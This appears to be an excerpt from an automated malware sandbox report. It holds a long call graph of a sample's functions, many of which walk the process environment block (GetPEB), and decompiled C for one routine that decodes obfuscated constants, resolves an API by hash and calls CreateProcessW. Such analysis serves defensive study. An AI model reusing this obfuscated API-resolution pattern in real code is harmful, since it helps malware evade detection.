4c3c5d8 GetPEB 4411->4412 4412->4405 4412->4406 4412->4409 4412->4410 4412->4411 4413 4c4fecb GetPEB 4412->4413 4523 4c50a64 4412->4523 4413->4412 4429 4c4393f 4414->4429 4415 4c3c5d8 GetPEB 4415->4429 4416 4c44244 GetPEB 4416->4429 4417 4c43d59 4420 4c52b09 GetPEB 4417->4420 4419 4c4c9b0 GetPEB 4419->4429 4421 4c43a00 4420->4421 4421->4122 4422 4c43992 4528 4c44244 4422->4528 4423 4c4e1f8 GetPEB 4423->4429 4424 4c4fecb GetPEB 4424->4429 4426 4c439af 4532 4c33325 4426->4532 4427 4c531aa GetPEB 4427->4429 4429->4415 4429->4416 4429->4417 4429->4419 4429->4421 4429->4422 4429->4423 4429->4424 4429->4427 4536 4c4e1ac 4429->4536 4431 4c4fecb GetPEB 4431->4421 4448 4c46859 4432->4448 4435 4c4e1f8 GetPEB 4435->4448 4436 4c4792e 4572 4c4e358 4436->4572 4440 4c47943 4440->4122 4441 4c52b09 GetPEB 4441->4448 4442 4c4e358 GetPEB 4442->4448 4443 4c4fecb GetPEB 4443->4448 4446 4c53e0e GetPEB 4446->4448 4448->4435 4448->4436 4448->4440 4448->4441 4448->4442 4448->4443 4448->4446 4540 4c3ed66 4448->4540 4544 4c3dda9 4448->4544 4548 4c34bfc 4448->4548 4557 4c510dc 4448->4557 4561 4c3ef0c 4448->4561 4564 4c34a88 4448->4564 4568 4c4c8cf 4448->4568 4452 4c507c6 4449->4452 4453 4c50a10 4452->4453 4464 4c357b8 4452->4464 4479 4c54d53 4452->4479 4453->4385 4455 4c4c9cc 4454->4455 4503 4c3db68 4455->4503 4461 4c546ed 4458->4461 4459 4c52b09 GetPEB 4459->4461 4460 4c3c5d8 GetPEB 4460->4461 4461->4459 4461->4460 4462 4c54d2e 4461->4462 4463 4c511b0 GetPEB 4461->4463 4462->4385 4463->4461 4466 4c357fa 4464->4466 4467 4c3c5d8 GetPEB 4466->4467 4469 4c366de 4466->4469 4471 4c366dc 4466->4471 4473 4c4e1f8 GetPEB 4466->4473 4474 4c3738a GetPEB 4466->4474 4475 4c52b09 GetPEB 4466->4475 4478 4c4fecb GetPEB 4466->4478 4483 4c4cbe9 4466->4483 4487 4c322c9 4466->4487 4491 4c31bc9 4466->4491 4495 4c3f288 4466->4495 4499 4c512c1 4466->4499 4467->4466 4470 4c3f7fe GetPEB 4469->4470 4470->4471 4471->4452 4473->4466 4474->4466 4475->4466 4478->4466 4480 4c54d85 4479->4480 4481 4c3eb52 GetPEB 4480->4481 4482 4c54e23 4481->4482 4482->4452 4484 4c4cc0e 4483->4484 4485 4c3eb52 GetPEB 4484->4485 4486 4c4cc8d 4485->4486 4486->4466 4488 4c322e8 4487->4488 4489 4c3eb52 GetPEB 4488->4489 4490 4c32377 4489->4490 4490->4466 4492 4c31bfb 4491->4492 4493 4c3eb52 GetPEB 4492->4493 4494 4c31c85 4493->4494 4494->4466 4496 4c3f2b2 4495->4496 4497 4c3eb52 GetPEB 4496->4497 4498 4c3f350 4497->4498 4498->4466 4500 4c512da 4499->4500 4501 4c3eb52 GetPEB 4500->4501 4502 4c51380 4501->4502 4502->4466 4504 4c3db84 4503->4504 4505 4c3eb52 GetPEB 4504->4505 4506 4c3dc0b 4505->4506 4506->4385 4508 4c3503c 4507->4508 4509 4c4c9b0 GetPEB 4508->4509 4510 4c350e1 4509->4510 4510->4403 4515 4c3e806 4511->4515 4512 4c4cad5 GetPEB 4512->4515 4513 4c3c5d8 GetPEB 4513->4515 4514 4c3eb40 4514->4403 4515->4512 4515->4513 4515->4514 4517 4c3fbad 4516->4517 4518 4c3c5d8 GetPEB 4517->4518 4519 4c40086 4517->4519 4520 4c32194 GetPEB 4517->4520 4521 4c40084 4517->4521 4518->4517 4522 4c52b09 GetPEB 4519->4522 4520->4517 4521->4403 4522->4521 4526 4c50a7e 4523->4526 4524 4c4c4f8 GetPEB 4524->4526 4525 4c3c5d8 GetPEB 4525->4526 4526->4524 4526->4525 4527 4c50da7 4526->4527 4527->4412 4529 4c4425e 4528->4529 4530 4c3c5d8 GetPEB 4529->4530 4531 4c4430e 4530->4531 4531->4426 4531->4531 4533 4c3333e 4532->4533 4534 4c531aa GetPEB 4533->4534 4535 4c3335a 4534->4535 4535->4431 4537 4c4e1ce 4536->4537 4538 4c531aa GetPEB 4537->4538 4539 4c4e1f0 4538->4539 4539->4429 4541 4c3eda1 4540->4541 4542 4c3eb52 GetPEB 4541->4542 4543 4c3ee49 4542->4543 4543->4448 4545 4c3ddcb 4544->4545 4546 4c3eb52 GetPEB 4545->4546 4547 4c3de63 4546->4547 4547->4448 4550 4c34ec7 4548->4550 4551 4c34fee 4550->4551 4554 4c3c5d8 GetPEB 4550->4554 4555 4c4c9b0 GetPEB 4550->4555 4556 4c52b09 GetPEB 4550->4556 4576 4c49c65 4550->4576 4552 4c52b09 GetPEB 4551->4552 4553 4c35009 4551->4553 4552->4553 4553->4448 4554->4550 4555->4550 4556->4550 4558 4c51100 4557->4558 4559 4c3eb52 GetPEB 4558->4559 4560 4c5119a 4559->4560 4560->4448 4580 4c460b8 4561->4580 4565 4c34abc 4564->4565 4566 4c3eb52 GetPEB 4565->4566 4567 4c34b44 4566->4567 4567->4448 4569 4c4c8f4 4568->4569 4570 4c3eb52 GetPEB 4569->4570 4571 4c4c99d 4570->4571 4571->4448 4573 4c4e36b 4572->4573 4574 4c3eb52 GetPEB 4573->4574 4575 4c4e3fa 4574->4575 4575->4440 4577 4c49c85 4576->4577 4578 4c3eb52 GetPEB 4577->4578 4579 4c49d29 4578->4579 4579->4550 4581 4c460de 4580->4581 4582 4c3eb52 GetPEB 4581->4582 4583 4c3efd1 4582->4583 4583->4448 4595 4c31f38 4584->4595 4588 4c40ade 4587->4588 4621 4c4f790 4588->4621 4590 4c40c1f 4590->4133 4594 4c51538 GetPEB 4594->4590 4599 4c31f57 4595->4599 4600 4c320cc 4599->4600 4602 4c320da 4599->4602 4604 4c37603 4599->4604 4607 4c506ec 4599->4607 4611 4c3bd23 4599->4611 4615 4c3e5c0 4599->4615 4603 4c51538 GetPEB 4600->4603 4602->4133 4603->4602 4605 4c3eb52 GetPEB 4604->4605 4606 4c376d3 4605->4606 4606->4599 4608 4c50702 4607->4608 4609 4c3eb52 GetPEB 4608->4609 4610 4c5079c 4609->4610 4610->4599 4612 4c3bd40 4611->4612 4613 4c3eb52 GetPEB 4612->4613 4614 4c3bdeb 4613->4614 4614->4599 4618 4c3556b 4615->4618 4619 4c3eb52 GetPEB 4618->4619 4620 4c355f6 4619->4620 4620->4599 4622 4c3eb52 GetPEB 4621->4622 4623 4c40bf0 4622->4623 4623->4590 4624 4c3daaa 4623->4624 4625 4c3dac8 4624->4625 4626 4c3eb52 GetPEB 4625->4626 4627 4c3db55 4626->4627 4627->4594 4629 4c4e10e 4628->4629 4630 4c3eb52 GetPEB 4629->4630 4631 4c4e19c 4630->4631 4631->4141 4633 4c48c96 4632->4633 4634 4c3eb52 GetPEB 4633->4634 4635 4c48d2f 4634->4635 4635->4141 4640 4c4f859 4636->4640 4637 4c4a1c0 GetPEB 4637->4640 4638 4c4fb47 4638->4141 4639 4c3c5d8 GetPEB 4639->4640 4640->4637 4640->4638 4640->4639 4641 4c4fb19 4640->4641 4647 4c4a1c0 4641->4647 4644 4c354c9 4643->4644 4645 4c3eb52 GetPEB 4644->4645 4646 4c3555f 4645->4646 4646->4139 4648 4c4a1f0 4647->4648 4649 4c3eb52 GetPEB 4648->4649 4650 4c4a28c 4649->4650 4650->4638 4652 4c5451c 4651->4652 4653 4c3eb52 GetPEB 4652->4653 4654 4c545b7 4653->4654 4654->4150 4656 4c3eb52 GetPEB 4655->4656 4657 4c3dc97 4656->4657 4657->4165 4659 4c544d8 4658->4659 4660 4c531aa GetPEB 4659->4660 4661 4c544f7 4660->4661 4661->4165 4663 4c46564 4662->4663 4664 4c4fe2a GetPEB 4663->4664 4665 4c46749 4664->4665 4666 4c4fe2a GetPEB 4665->4666 4667 4c46761 4666->4667 4668 4c4fe2a GetPEB 4667->4668 4669 4c46774 4668->4669 4676 4c3e204 4669->4676 4672 4c3e204 GetPEB 4673 4c4679e 4672->4673 4680 4c3e4f8 4673->4680 4677 4c3e217 4676->4677 4678 4c3eb52 GetPEB 4677->4678 4679 4c3e2ae 4678->4679 4679->4672 4681 4c3e511 4680->4681 4682 4c3eb52 GetPEB 4681->4682 4683 4c3e5b5 4682->4683 4683->4164 4685 4c353e3 4684->4685 4686 4c3eb52 GetPEB 4685->4686 4687 4c3546b 4686->4687 4687->4058 4689 4c400d8 4688->4689 4690 4c3eb52 GetPEB 4689->4690 4691 4c40170 4690->4691 4691->4177 4693 4c42d03 4692->4693 4694 4c3eb52 GetPEB 4693->4694 4695 4c42d8e 4694->4695 4695->4177 4697 4c32e23 4696->4697 4698 4c3eb52 GetPEB 4697->4698 4699 4c32ea5 4698->4699 4699->4177 4701 4c3f997 4700->4701 4702 4c531aa GetPEB 4701->4702 4703 4c3f9b9 4702->4703 4703->4177 4705 4c3305c 4704->4705 4706 4c3eb52 GetPEB 4705->4706 4707 4c330db 4706->4707 4707->4193 4720 4c4b27f 4708->4720 4709 4c4bb76 4710 4c52b09 GetPEB 4709->4710 4711 4c4bb89 4710->4711 4711->4193 4716 4c52b09 GetPEB 4716->4720 4717 4c3dc1b GetPEB 4717->4720 4718 4c33046 GetPEB 4718->4720 4719 4c3c5d8 GetPEB 4719->4720 4720->4709 4720->4711 4720->4716 4720->4717 4720->4718 4720->4719 4729 4c3ee62 4720->4729 4733 4c3fa95 4720->4733 4737 4c4fd4e 4720->4737 4741 4c3c3a7 4720->4741 4722 4c47c9b 4721->4722 4723 4c3eb52 GetPEB 4722->4723 4724 4c47d35 4723->4724 4724->4193 4726 4c4e8d0 4725->4726 4727 4c3eb52 GetPEB 4726->4727 4728 4c4e946 4727->4728 4728->4193 4730 4c3ee81 4729->4730 4731 4c3eb52 GetPEB 4730->4731 4732 4c3eefb 4731->4732 4732->4720 4734 4c3fad4 4733->4734 4735 4c3eb52 GetPEB 4734->4735 4736 4c3fb70 4735->4736 4736->4720 4738 4c4fd79 4737->4738 4739 4c3eb52 GetPEB 4738->4739 4740 4c4fe12 4739->4740 4740->4720 4742 4c3c3c9 4741->4742 4743 4c3eb52 GetPEB 4742->4743 4744 4c3c463 4743->4744 4744->4720 4747 4c49e1d 4745->4747 4746 4c44244 GetPEB 4746->4747 4747->4746 4750 4c4a1b5 4747->4750 4752 4c4fecb GetPEB 4747->4752 4753 4c496c2 4747->4753 4757 4c45515 4747->4757 4762 4c50a1a 4747->4762 4750->4200 4752->4747 4754 4c496db 4753->4754 4755 4c3eb52 GetPEB 4754->4755 4756 4c49765 4755->4756 4756->4747 4766 4c40de5 4757->4766 4759 4c45670 4759->4747 4763 4c50a3f 4762->4763 4764 4c531aa GetPEB 4763->4764 4765 4c50a5c 4764->4765 4765->4747 4767 4c40dfe 4766->4767 4768 4c3eb52 GetPEB 4767->4768 4769 4c40eae 4768->4769 4769->4759 4770 4c5138b 4769->4770 4771 4c513b8 4770->4771 4772 4c3eb52 GetPEB 4771->4772 4773 4c51475 4772->4773 4773->4759 4778 4c408fe 4774->4778 4775 4c50db1 GetPEB 4775->4778 4776 4c409b5 4776->4206 4777 4c409b7 4779 4c3e204 GetPEB 4777->4779 4778->4775 4778->4776 4778->4777 4780 4c400c5 GetPEB 4778->4780 4779->4776 4780->4778 4782 4c47a2c 4781->4782 4783 4c4e1f8 GetPEB 4782->4783 4784 4c47bfe 4783->4784 4785 4c42c9c GetPEB 4784->4785 4786 4c47c1b 4785->4786 4787 4c4fecb GetPEB 4786->4787 4788 4c47c2e 4787->4788 4791 4c3d061 4788->4791 4792 4c3d07a 4791->4792 4793 4c3eb52 GetPEB 4792->4793 4794 4c3d141 4793->4794 4794->4220 4796 4c4b1af 4795->4796 4797 4c3eb52 GetPEB 4796->4797 4798 4c4b248 4797->4798 4798->4058 4816 4c483d6 4799->4816 4800 4c4851b 4802 4c31a34 GetPEB 4800->4802 4801 4c48516 4801->4230 4804 4c4854b 4802->4804 4803 4c50db1 GetPEB 4803->4816 4805 4c4e1f8 GetPEB 4804->4805 4807 4c48565 4805->4807 4806 4c409dd GetPEB 4806->4816 4808 4c52d0a GetPEB 4807->4808 4810 4c485a6 4808->4810 4811 4c4fecb GetPEB 4810->4811 4813 4c485c6 4811->4813 4812 4c4e1f8 GetPEB 4812->4816 4814 4c485ff 2 API calls 4813->4814 4814->4801 4815 4c52d0a GetPEB 4815->4816 4816->4800 4816->4801 4816->4803 4816->4806 4816->4812 4816->4815 4817 4c4fecb GetPEB 4816->4817 4916 4c3baa9 4816->4916 4920 4c3bfbe 4816->4920 4817->4816 4828 4c504c6 4819->4828 4820 4c505e9 4822 4c485ff 2 API calls 4820->4822 4821 4c505e7 4821->4230 4822->4821 4823 4c50db1 GetPEB 4823->4828 4824 4c409dd GetPEB 4824->4828 4825 4c3baa9 GetPEB 4825->4828 4826 4c4e1f8 GetPEB 4826->4828 4827 4c52d0a GetPEB 4827->4828 4828->4820 4828->4821 4828->4823 4828->4824 4828->4825 4828->4826 4828->4827 4829 4c4fecb GetPEB 4828->4829 4830 4c3bfbe GetPEB 4828->4830 4829->4828 4830->4828 4835 4c3ba26 4831->4835 4832 4c3ba9c 4832->4230 4833 4c52b09 GetPEB 4833->4835 4834 4c51028 GetPEB 4834->4835 4835->4832 4835->4833 4835->4834 4837 4c51538 GetPEB 4835->4837 4931 4c3f0e9 4835->4931 4837->4835 4939 4c51f6d 4838->4939 4840 4c52b09 GetPEB 4842 4c3b3e7 4840->4842 4841 4c50a64 GetPEB 4841->4842 4842->4840 4842->4841 4844 4c485ff 2 API calls 4842->4844 4845 4c31a34 GetPEB 4842->4845 4846 4c50db1 GetPEB 4842->4846 4847 4c544ad GetPEB 4842->4847 4848 4c3b7fd 4842->4848 4849 4c3b7fb 4842->4849 4851 4c409dd GetPEB 4842->4851 4852 4c400c5 GetPEB 4842->4852 4853 4c4fecb GetPEB 4842->4853 4854 4c3baa9 GetPEB 4842->4854 4856 4c4e1f8 GetPEB 4842->4856 4857 4c52d0a GetPEB 4842->4857 4858 4c3bfbe GetPEB 4842->4858 4942 4c3f726 4842->4942 4946 4c4d8db 4842->4946 4844->4842 4845->4842 4846->4842 4847->4842 4850 4c51538 GetPEB 4848->4850 4849->4230 4850->4849 4851->4842 4852->4842 4853->4842 4854->4842 4856->4842 4857->4842 4858->4842 4860 4c4cfe9 4859->4860 4861 4c4d0f3 4860->4861 4862 4c4d0f1 4860->4862 4956 4c40ebc 4860->4956 4960 4c53263 4860->4960 4968 4c3e2bd 4860->4968 4864 4c3f0e9 GetPEB 4861->4864 4862->4230 4864->4862 4887 4c32ad8 4867->4887 4868 4c32d78 4870 4c485ff 2 API calls 4868->4870 4869 4c4c387 GetPEB 4869->4887 4875 4c32da8 4870->4875 4872 4c32d64 4876 4c51538 GetPEB 4872->4876 4874 4c32d62 4874->4230 4875->4874 4877 4c51538 GetPEB 4875->4877 4876->4874 4877->4872 4878 4c50db1 GetPEB 4878->4887 4879 4c51538 GetPEB 4879->4887 4880 4c409dd GetPEB 4880->4887 4882 4c3baa9 GetPEB 4882->4887 4883 4c4e1f8 GetPEB 4883->4887 4884 4c52d0a GetPEB 4884->4887 4885 4c4fecb GetPEB 4885->4887 4886 4c3bfbe GetPEB 4886->4887 4887->4868 4887->4869 4887->4872 4887->4874 4887->4878 4887->4879 4887->4880 4887->4882 4887->4883 4887->4884 4887->4885 4887->4886 4981 4c49774 4887->4981 4989 4c4017b 4887->4989 4998 4c4bc6b 4887->4998 4891 4c4aadf 4888->4891 4889 4c4ac24 4890 4c31a34 GetPEB 4889->4890 4892 4c4ac51 4890->4892 4891->4889 4893 4c50db1 GetPEB 4891->4893 4895 4c409dd GetPEB 4891->4895 4898 4c3baa9 GetPEB 4891->4898 4901 4c4e1f8 GetPEB 4891->4901 4904 4c52d0a GetPEB 4891->4904 4905 4c4ac1f 4891->4905 4906 4c4fecb GetPEB 4891->4906 4907 4c3bfbe GetPEB 4891->4907 4894 4c4e1f8 GetPEB 4892->4894 4893->4891 4896 4c4ac74 4894->4896 4895->4891 4897 4c52d0a GetPEB 4896->4897 4899 4c4acaf 4897->4899 4898->4891 4900 4c4fecb GetPEB 4899->4900 4902 4c4accf 4900->4902 4901->4891 4903 4c485ff 2 API calls 4902->4903 4903->4905 4904->4891 4905->4230 4906->4891 4907->4891 4909 4c5307f 4908->4909 4910 4c53263 GetPEB 4909->4910 4911 4c5318c 4909->4911 4913 4c40ebc GetPEB 4909->4913 4914 4c5318a 4909->4914 4915 4c3e2bd GetPEB 4909->4915 4910->4909 4912 4c3f0e9 GetPEB 4911->4912 4912->4914 4913->4909 4914->4230 4915->4909 4917 4c3bac2 4916->4917 4918 4c3dc1b GetPEB 4917->4918 4919 4c3bb97 4918->4919 4919->4816 4922 4c3bfd7 4920->4922 4921 4c3c273 4924 4c51538 GetPEB 4921->4924 4922->4921 4923 4c545ca GetPEB 4922->4923 4925 4c3c271 4922->4925 4927 4c4c41a 4922->4927 4923->4922 4924->4925 4925->4816 4928 4c4c440 4927->4928 4929 4c3eb52 GetPEB 4928->4929 4930 4c4c4e1 4929->4930 4930->4922 4932 4c3f0ff 4931->4932 4935 4c3f8a9 4932->4935 4936 4c3f8c6 4935->4936 4937 4c3eb52 GetPEB 4936->4937 4938 4c3f1c3 4937->4938 4938->4835 4940 4c3eb52 GetPEB 4939->4940 4941 4c52000 4940->4941 4941->4842 4943 4c3f758 4942->4943 4944 4c3eb52 GetPEB 4943->4944 4945 4c3f7dc 4944->4945 4945->4842 4951 4c4d8fb 4946->4951 4947 4c3c5d8 GetPEB 4947->4951 4948 4c4db95 4952 4c4cad5 4948->4952 4949 4c4db93 4949->4842 4951->4947 4951->4948 4951->4949 4953 4c4caef 4952->4953 4954 4c4c9b0 GetPEB 4953->4954 4955 4c4cbda 4954->4955 4955->4949 4957 4c40ede 4956->4957 4958 4c3eb52 GetPEB 4957->4958 4959 4c40f72 4958->4959 4959->4860 4961 4c5327e 4960->4961 4962 4c53556 4961->4962 4973 4c462c7 4961->4973 4962->4860 4965 4c4c9b0 GetPEB 4966 4c5350d 4965->4966 4966->4962 4967 4c4c9b0 GetPEB 4966->4967 4967->4966 4969 4c3e2d8 4968->4969 4970 4c3483c GetPEB 4969->4970 4971 4c3e3f5 4969->4971 4977 4c31afd 4969->4977 4970->4969 4971->4860 4974 4c462eb 4973->4974 4975 4c3eb52 GetPEB 4974->4975 4976 4c46383 4975->4976 4976->4962 4976->4965 4978 4c31b10 4977->4978 4979 4c3eb52 GetPEB 4978->4979 4980 4c31bba 4979->4980 4980->4969 4986 4c49797 4981->4986 4983 4c4bc6b GetPEB 4983->4986 4984 4c49967 4984->4887 4986->4983 4986->4984 4987 4c49956 4986->4987 5001 4c372c4 4986->5001 5005 4c3f9c1 4986->5005 4988 4c51538 GetPEB 4987->4988 4988->4984 4994 4c401c2 4989->4994 4992 4c4fe2a GetPEB 4992->4994 4993 4c406f1 4993->4887 4994->4992 4994->4993 4995 4c4e1f8 GetPEB 4994->4995 4997 4c4fecb GetPEB 4994->4997 5009 4c3473d 4994->5009 5013 4c44178 4994->5013 5017 4c47952 4994->5017 4995->4994 4997->4994 4999 4c3eb52 GetPEB 4998->4999 5000 4c4bd0a 4999->5000 5000->4887 5002 4c372e0 5001->5002 5003 4c3eb52 GetPEB 5002->5003 5004 4c3737c 5003->5004 5004->4986 5006 4c3f9eb 5005->5006 5007 4c3eb52 GetPEB 5006->5007 5008 4c3fa7c 5007->5008 5008->4986 5010 4c34786 5009->5010 5011 4c3eb52 GetPEB 5010->5011 5012 4c3481a 5011->5012 5012->4994 5014 4c44194 5013->5014 5015 4c3eb52 GetPEB 5014->5015 5016 4c44233 5015->5016 5016->4994 5018 4c47965 5017->5018 5019 4c3eb52 GetPEB 5018->5019 5020 4c47a04 5019->5020 5020->4994 5023 4c3dd16 5021->5023 5024 4c3dd30 5021->5024 5022 4c52b09 GetPEB 5022->5023 5023->5022 5023->5024 5024->4245 5031 4c541ee 5025->5031 5026 4c543c9 5026->4245 5027 4c4e1f8 GetPEB 5027->5031 5029 4c3f96f GetPEB 5029->5031 5030 4c543b4 5033 4c52b09 GetPEB 5030->5033 5031->5026 5031->5027 5031->5029 5031->5030 5032 4c4fecb GetPEB 5031->5032 5034 4c3c5d8 GetPEB 5031->5034 5039 4c43d85 5031->5039 5032->5031 5033->5026 5034->5031 5036 4c3328d 5035->5036 5043 4c37442 5036->5043 5040 4c43d9c 5039->5040 5041 4c3c5d8 GetPEB 5040->5041 5042 4c43e5b 5041->5042 5042->5031 5042->5042 5047 4c37462 5043->5047 5044 4c3c5d8 GetPEB 5044->5047 5047->5044 5048 4c37576 5047->5048 5049 4c3331d 5047->5049 5052 4c48fae 5047->5052 5061 4c40d04 5047->5061 5066 4c40f86 5047->5066 5051 4c52b09 GetPEB 5048->5051 5049->4245 5051->5049 5059 4c494f3 5052->5059 5053 4c4969b 5055 4c3f7fe GetPEB 5053->5055 5054 4c49699 5054->5047 5055->5054 5056 4c4e1f8 GetPEB 5056->5059 5058 4c3738a GetPEB 5058->5059 5059->5053 5059->5054 5059->5056 5059->5058 5060 4c4fecb GetPEB 5059->5060 5083 4c3bc32 5059->5083 5060->5059 5087 4c32ebf 5061->5087 5064 4c52b09 GetPEB 5065 4c40dde 5064->5065 5065->5047 5067 4c41c7c 5066->5067 5069 4c3bc32 GetPEB 5067->5069 5070 4c4c237 GetPEB 5067->5070 5071 4c32ebf GetPEB 5067->5071 5072 4c4e1f8 GetPEB 5067->5072 5074 4c42118 5067->5074 5076 4c42116 5067->5076 5079 4c3738a GetPEB 5067->5079 5081 4c4c9b0 GetPEB 5067->5081 5082 4c4fecb GetPEB 5067->5082 5091 4c33431 5067->5091 5106 4c516c0 5067->5106 5110 4c4c2cf 5067->5110 5114 4c543e6 5067->5114 5118 4c351e7 5067->5118 5069->5067 5070->5067 5071->5067 5072->5067 5077 4c3f7fe GetPEB 5074->5077 5076->5047 5077->5076 5079->5067 5081->5067 5082->5067 5084 4c3bc62 5083->5084 5085 4c3eb52 GetPEB 5084->5085 5086 4c3bd08 5085->5086 5086->5059 5088 4c32ed3 5087->5088 5089 4c3eb52 GetPEB 5088->5089 5090 4c32f74 5089->5090 5090->5064 5093 4c34267 5091->5093 5092 4c52b09 GetPEB 5092->5093 5093->5092 5094 4c4e1f8 GetPEB 5093->5094 5095 4c34738 5093->5095 5096 4c3c5d8 GetPEB 5093->5096 5097 4c342a0 5093->5097 5098 4c3f288 GetPEB 5093->5098 5100 4c400c5 GetPEB 5093->5100 5103 4c3738a GetPEB 5093->5103 5105 4c4fecb GetPEB 5093->5105 5122 4c350e8 5093->5122 5126 4c349a4 5093->5126 5094->5093 5095->5095 5096->5093 5101 4c3f7fe GetPEB 5097->5101 5098->5093 5100->5093 5102 4c342be 5101->5102 5102->5067 5103->5093 5105->5093 5107 4c516f5 5106->5107 5108 4c3eb52 GetPEB 5107->5108 5109 4c517a1 5108->5109 5109->5067 5111 4c4c2e5 5110->5111 5112 4c3eb52 GetPEB 5111->5112 5113 4c4c370 5112->5113 5113->5067 5115 4c54405 5114->5115 5116 4c3eb52 GetPEB 5115->5116 5117 4c54498 5116->5117 5117->5067 5119 4c35206 5118->5119 5120 4c3eb52 GetPEB 5119->5120 5121 4c352a5 5120->5121 5121->5067 5123 4c35123 5122->5123 5124 4c3eb52 GetPEB 5123->5124 5125 4c351c6 5124->5125 5125->5093 5127 4c349d5 5126->5127 5128 4c3eb52 GetPEB 5127->5128 5129 4c34a6b 5128->5129 5129->5093 5131 4c348f4 5130->5131 5132 4c3eb52 GetPEB 5131->5132 5133 4c34996 5132->5133 5133->4251 5135 4c31eb4 5134->5135 5136 4c3eb52 GetPEB 5135->5136 5137 4c31f2d 5136->5137 5137->4264 5139 4c3bf93 5138->5139 5140 4c531aa GetPEB 5139->5140 5141 4c3bfb6 5140->5141 5141->4267 5146 4c4dfa2 5142->5146 5143 4c353d0 GetPEB 5143->5146 5145 4c4e1f8 GetPEB 5145->5146 5146->5143 5146->5145 5147 4c4e0e6 5146->5147 5148 4c32dea GetPEB 5146->5148 5149 4c4fecb GetPEB 5146->5149 5160 4c5298d 5146->5160 5147->4284 5148->5146 5149->5146 5152 4c31cc0 5150->5152 5153 4c4fe2a GetPEB 5152->5153 5154 4c31e90 5152->5154 5164 4c32f80 5152->5164 5168 4c406fe 5152->5168 5153->5152 5154->4284 5157 4c38581 5156->5157 5158 4c3eb52 GetPEB 5157->5158 5159 4c3862b 5158->5159 5159->4287 5161 4c529a3 5160->5161 5162 4c3eb52 GetPEB 5161->5162 5163 4c52a27 5162->5163 5163->5146 5165 4c32f9f 5164->5165 5166 4c3eb52 GetPEB 5165->5166 5167 4c33039 5166->5167 5167->5152 5169 4c4071c 5168->5169 5170 4c3eb52 GetPEB 5169->5170 5171 4c407dc 5170->5171 5171->5152 5188 4c319eb 5189 4c319b1 5188->5189 5189->5188 5190 4c3eb52 GetPEB 5189->5190 5191 4c31aeb 5190->5191 5213 4c4befd 5214 4c409dd GetPEB 5213->5214 5215 4c4c1a1 5214->5215 5216 4c5061d 2 API calls 5215->5216 5217 4c4c1b8 5216->5217 5218 4c4e1f8 GetPEB 5217->5218 5225 4c4c229 5217->5225 5219 4c4c1d6 5218->5219 5220 4c52d0a GetPEB 5219->5220 5221 4c4c1ff 5220->5221 5222 4c4fecb GetPEB 5221->5222 5223 4c4c212 5222->5223 5224 4c3d061 GetPEB 5223->5224 5224->5225 5192 4c536aa 5202 4c53bc2 5192->5202 5193 4c3c5d8 GetPEB 5193->5202 5194 4c52b09 GetPEB 5194->5202 5195 4c50db1 GetPEB 5195->5202 5196 4c53df0 5197 4c51538 GetPEB 5196->5197 5198 4c53dee 5197->5198 5199 4c409dd GetPEB 5199->5202 5201 4c545ca GetPEB 5201->5202 5202->5193 5202->5194 5202->5195 5202->5196 5202->5198 5202->5199 5202->5201 5203 4c5061d 2 API calls 5202->5203 5205 4c4e406 5202->5205 5209 4c527bc 5202->5209 5203->5202 5206 4c4e434 5205->5206 5207 4c3eb52 GetPEB 5206->5207 5208 4c4e4c9 5207->5208 5208->5202 5210 4c527cf 5209->5210 5211 4c3eb52 GetPEB 5210->5211 5212 4c52873 5211->5212 5212->5202

                                                                                                                                                                            Executed Functions

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 63 4c52c24-4c52d09 call 4c4fe29 call 4c3eb52 CreateProcessW
                                                                                                                                                                            C-Code - Quality: 51%
                                                                                                                                                                            			E04C52C24(WCHAR* __ecx, void* __edx, intOrPtr _a12, intOrPtr _a20, int _a24, intOrPtr _a28, struct _STARTUPINFOW* _a32, intOrPtr _a40, intOrPtr _a44, WCHAR* _a52, struct _PROCESS_INFORMATION* _a56) {
                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                            				struct _SECURITY_ATTRIBUTES* _v24;
                                                                                                                                                                            				struct _SECURITY_ATTRIBUTES* _v28;
                                                                                                                                                                            				intOrPtr _v32;
                                                                                                                                                                            				void* _t49;
                                                                                                                                                                            				int _t56;
                                                                                                                                                                            				WCHAR* _t60;
                                                                                                                                                                            
                                                                                                                                                                            				_push(_a56);
                                                                                                                                                                            				_t60 = __ecx;
                                                                                                                                                                            				_push(_a52);
                                                                                                                                                                            				_push(0);
                                                                                                                                                                            				_push(_a44);
                                                                                                                                                                            				_push(_a40);
                                                                                                                                                                            				_push(0);
                                                                                                                                                                            				_push(_a32);
                                                                                                                                                                            				_push(_a28);
                                                                                                                                                                            				_push(_a24);
                                                                                                                                                                            				_push(_a20);
                                                                                                                                                                            				_push(0);
                                                                                                                                                                            				_push(_a12);
                                                                                                                                                                            				_push(0);
                                                                                                                                                                            				_push(0);
                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                            				E04C4FE29(_t49);
                                                                                                                                                                            				_v32 = 0x534833;
                                                                                                                                                                            				_v28 = 0;
                                                                                                                                                                            				_v24 = 0;
                                                                                                                                                                            				_v8 = 0x70adbe;
                                                                                                                                                                            				_v8 = _v8 >> 5;
                                                                                                                                                                            				_v8 = _v8 << 0xa;
                                                                                                                                                                            				_v8 = _v8 | 0x1d11c356;
                                                                                                                                                                            				_v8 = _v8 ^ 0x1f145645;
                                                                                                                                                                            				_v20 = 0xecea8a;
                                                                                                                                                                            				_v20 = _v20 | 0x5baa72b8;
                                                                                                                                                                            				_v20 = _v20 ^ 0x5be1d11d;
                                                                                                                                                                            				_v16 = 0x76217f;
                                                                                                                                                                            				_v16 = _v16 >> 0x10;
                                                                                                                                                                            				_v16 = _v16 | 0xe98780dc;
                                                                                                                                                                            				_v16 = _v16 ^ 0xe98c1e91;
                                                                                                                                                                            				_v12 = 0xeb975;
                                                                                                                                                                            				_v12 = _v12 ^ 0xd8138edb;
                                                                                                                                                                            				_v12 = _v12 | 0x0b4171d5;
                                                                                                                                                                            				_v12 = _v12 ^ 0xdb5d9300;
                                                                                                                                                                            				E04C3EB52(__ecx, __ecx, 0xb7160725, 0x75, 0xa2289af1);
                                                                                                                                                                            				_t56 = CreateProcessW(_a52, _t60, 0, 0, _a24, 0, 0, 0, _a32, _a56); // executed
                                                                                                                                                                            				return _t56;
                                                                                                                                                                            			}













                                                                                                                                                                            0x04c52c2c
                                                                                                                                                                            0x04c52c31
                                                                                                                                                                            0x04c52c33
                                                                                                                                                                            0x04c52c36
